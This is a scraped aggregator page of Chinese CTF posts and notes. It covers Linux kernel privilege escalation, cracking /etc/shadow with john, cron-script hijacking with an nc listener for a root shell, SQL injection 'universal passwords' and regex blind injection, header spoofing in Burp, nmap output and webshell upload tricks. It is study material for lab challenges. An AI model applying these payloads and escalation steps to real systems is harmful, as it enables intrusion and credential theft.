ctf

CTF-内核漏洞提权

家住魔仙堡 提交于 2019-11-29 13:49:07
1. 内核漏洞提权   查看发行版本:  cat /etc/issue  cat /etc/*-release   查看内核版本:  uname -a   寻找内核溢出代码:  searchspoit 发行版本 内核版本   上传内核溢出代码,编译执行  gcc xxx.c -o exploit                   chmod +x exploit                   ./exploit 2. 明文root密码提取   大多linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件相关   passwd里储存了用户,shadow里是密码的hash。passwd全用户可读,root可写。shadow仅root读写。   例如       /etc/passwd /etc/shadow       unshadow passwd shadow > cracked       john cracked 3. 计划任务   一般定时执行的任务由crontab管理,非root用户不可列出,但 /etc/内系统的计划任务可以被列出。   如果其中一个脚本配置成任意用户可写,就可以修改脚本回连rootshell   攻击机启动nc监听端口 nc -nlvp port   脚本代码:       #!/user/bin/python    

实验吧CTF练习题---web---登录一下好吗解析

社会主义新天地 提交于 2019-11-29 10:32:18
实验吧web之登陆一下好么 地址: http://www.shiyanbar.com/ctf/1942 flag值:ctf{51d1bf8fb65a8c2406513ee8f52283e7} 解题步骤: 1、看题目提示,说是把所有语句都过滤了,那就不要往注入语句那个地方想了 2、检查网页源代码,没有啥问题,尝试用一下万能密码 一:username:1'='0 password:1'='0 二:username:what'=' password:what'=' 三:username:admin'=' password:admin'=' 3、拿取flag值,可以通过mysql数据库拿取flag值,自己研究 来源: https://www.cnblogs.com/redHskb/p/11515618.html

实验吧CTF练习题---WEB---头有点大解析

僤鯓⒐⒋嵵緔 提交于 2019-11-29 06:31:13
实验吧web之头有点大 地址: http://www.shiyanbar.com/ctf/29 flag值:HTTpH34der 解题步骤: 1.进入解题界面,看提示 2.说提示很多,再提示没意思,于是进入解题链接,如下 3.查看源代码并没有发现什么问题,于是决定翻译一下这三行是什么意思,判断跟题意有没有关联 4.现在知道了获取flag值的前提条件,第一点是使用并安装.net framework 9.9,第二点就是确保在英格兰地区使用Internet exploer浏览器浏览站点,据我所知并没有9.9这个版本,也没法用vpn解这道题,于是想到是查看源码,用burp抓包看看 5.通过抓包也没有发现什么问题,选择Action,选择CTRL+R复制到Repeaterr进行下一步操作 6.点击GO,使页面进到下一个界面,这时我们开启的是抓包,所以浏览器界面不会出现任何变化 7.想到前面需要变更的内容,我们选择在左侧代码里进行修改,改动为如下 8.第一步操作是加入.net framework 9.9,第二步是加入英格兰地区,点击GO看下一步提示 9.发现右侧代码出现key字样,flag值提交就可以了,这道题应注意题目要求,不要丢失任何一个信息。 来源: https://www.cnblogs.com/redHskb/p/11460023.html

CTF KFIOFan: 2 Vulnhub Walkthorugh

久未见 提交于 2019-11-28 23:57:57
主机扫描: ╰─ nmap -p- -A 10.10.202.152 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 16:55 CST Nmap scan report for 10.10.202.152 Host is up (0.00098s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 26921/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 492658 Apr 19 08:36 1.png | -rw-r--r-- 1 0 0 398665 Apr 19 08:36 2.png | -rw-r--r-- 1 0 0 397987 Apr 19 08:36 3.png | -rw-r--r-- 1 0 0 526658 Apr 19 08:36 4.png |_drwxr-xr-x 2 107 112 4096 May 16 00:15 serrure | ftp-syst: | STAT: | FTP server status: | Connected

ctf笔记 19.5.3-19.8.11

喜夏-厌秋 提交于 2019-11-28 23:06:06
在学ctf中学到的各类知识,以web安全为主 ffifdyop md5加密再组成sql等于$sql="select password from users where password=''or'<xxx>'" 用于绕过md5检测 图片隐写小技巧 图片类转txt gif用ps看图层 document.cookie="cookiename=cookievalue" 改cookie 见"._"一般为摩斯密码 Base64 A-Z,a-z,0-9,+/; Base32 A-Z,2-7; Base16(hex) 0-9,A-F Base加密若位数不齐,会用'='补齐,所以见'='可尝试Base解密 见"%number"可用url解码 见"&#number;"为Unicode编码 只出现"[ ]( ) ! "为jsfuck编码 只出现" > < + - . , [ ] "为brainfuck编码 --- MYSQL 数字型注入小结: 报错回显: ' 1=1 1=2判定注入可能 order by N 查字段数 and 1=2 union select 1,2,3...N 看正常回显,正常回显用于显示数据 and 1=2 union select database(),version() 查库名和版本 and 1=2 union select 1,group_concat(table_name)

ctf笔记 19.8.11-19.8.27

徘徊边缘 提交于 2019-11-28 23:06:01
文件上传漏洞 当php上传失败后,可考虑文件白名单(改后缀名为php5、php3) iis6解析漏洞:当上传到目录为/*.asp时,任何文件皆解析为asp,可以上传asp形式的图马或txt马,连接(连接时直接连即可) SQL注入 数字型注入:无单引号 字符型注入:前有单引号后有注释符,万能密码' or '1'='1 除外 盲注: 可用工具、程序、burp爆破来辅助 正则注入 1 and 1=(select 1 from information_schema.tables where table_schema='xxx' and table_name regexp '^us[a-z]' limit 0,1) 注意:正则匹配所有项,与常规盲注的limit n,1不同,正则是不需要改的 同样,用like类似正则 select user() like 'ro%' 弱口令 admin admin/admin admin888/admin 123456/admin 域名/test test/test test123 文件解析漏洞 目录解析 /xx.asp/webshell.jpg /xx.asa/webshell.jpg 文件解析 webshell.asp;jpg 适用于iis6 Apache解析漏洞 test.php.xxx.yyy x和y皆为无法识别的后缀名 copy xx.jpg /b

Hack the Breach 2.1 VM (CTF Challenge)

↘锁芯ラ 提交于 2019-11-28 22:23:32
主机扫描: ╰─ nmap -p- -A 192.168.110.151 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 09:48 CST Nmap scan report for 192.168.110.151 Host is up (0.00097s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 53637/udp status |_ 100024 1 55343/tcp status 55343/tcp open status 1 (RPC #100024) 65535/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0) | ssh-hostkey: | 1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d

CTF 资源

会有一股神秘感。 提交于 2019-11-28 20:31:44
1.《CTF 工具集》包括web工具、渗透环境、隐形工具、逆向工具、漏洞扫描工具、sql注入工具、暴力破解工具、加解密工具等等。 参考地址: https://www.ctftools.com/down/ 2.《CTF 竞赛入门指南》包括linux基础、web安全基础、逆向工程基础、密码学基础、安卓基础、漏洞分析、CTF主要工具使用、题解篇、实战篇等。 参考地址: https://firmianay.gitbooks.io/ctf-all-in-one/content/ 3. 《工控CTF大赛相关赛题》包括2018工业信息安全大赛、2019工业信息安全大赛、2018护网杯等题目。 参考地址: https://github.com/ddyy0308/CTF 4.《awesome-ctf》 参考地址: https://github.com/apsdehal/awesome-ctf 来源: https://www.cnblogs.com/17bdw/p/11426689.html

攻防世界 maze NJUPT CTF 2017

天涯浪子 提交于 2019-11-28 18:34:51
迷宫题 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 signed __int64 mid_i; // rbx 4 signed int mid_str; // eax 5 bool v5; // bp 6 bool v6; // al 7 const char *v7; // rdi 8 __int64 arr; // [rsp+0h] [rbp-28h] 9 10 arr = 0LL; 11 puts("Input flag:"); 12 scanf("%s", &s1, 0LL); 13 if ( strlen(&s1) != 24 || strncmp(&s1, "nctf{", 5uLL) || *(&byte_6010BF + 24) != '}' )// 输入24位,前5位为ntcf{ 第24位是} 14 { 15 LABEL_22: 16 puts("Wrong flag!"); 17 exit(-1); 18 } 19 mid_i = 5LL; 20 if ( strlen(&s1) - 1 > 5 ) 21 { 22 while ( 1 ) 23 { 24 mid_str = *(&s1 + mid_i); // 从输入的第5位开始 25 v5 = 0; 26 if ( mid

ctf笔记 19.8.11-19.8.27

自古美人都是妖i 提交于 2019-11-28 18:29:01
文件上传漏洞 当php上传失败后,可考虑文件白名单(改后缀名为php5、php3) iis6解析漏洞:当上传到目录为/*.asp时,任何文件皆解析为asp,可以上传asp形式的图马或txt马,连接(连接时直接连即可) SQL注入 数字型注入:无单引号 字符型注入:前有单引号后有注释符,万能密码' or '1'='1 除外 盲注: 可用工具、程序、burp爆破来辅助 正则注入 1 and 1=(select 1 from information_schema.tables where table_schema='xxx' and table_name regexp '^us[a-z]' limit 0,1) 注意:正则匹配所有项,与常规盲注的limit n,1不同,正则是不需要改的 同样,用like类似正则 select user() like 'ro%' 弱口令 admin admin/admin admin888/admin 123456/admin 域名/test test/test test123 文件解析漏洞 目录解析 /xx.asp/webshell.jpg /xx.asa/webshell.jpg 文件解析 webshell.asp;jpg 适用于iis6 Apache解析漏洞 test.php.xxx.yyy x和y皆为无法识别的后缀名 copy xx.jpg /b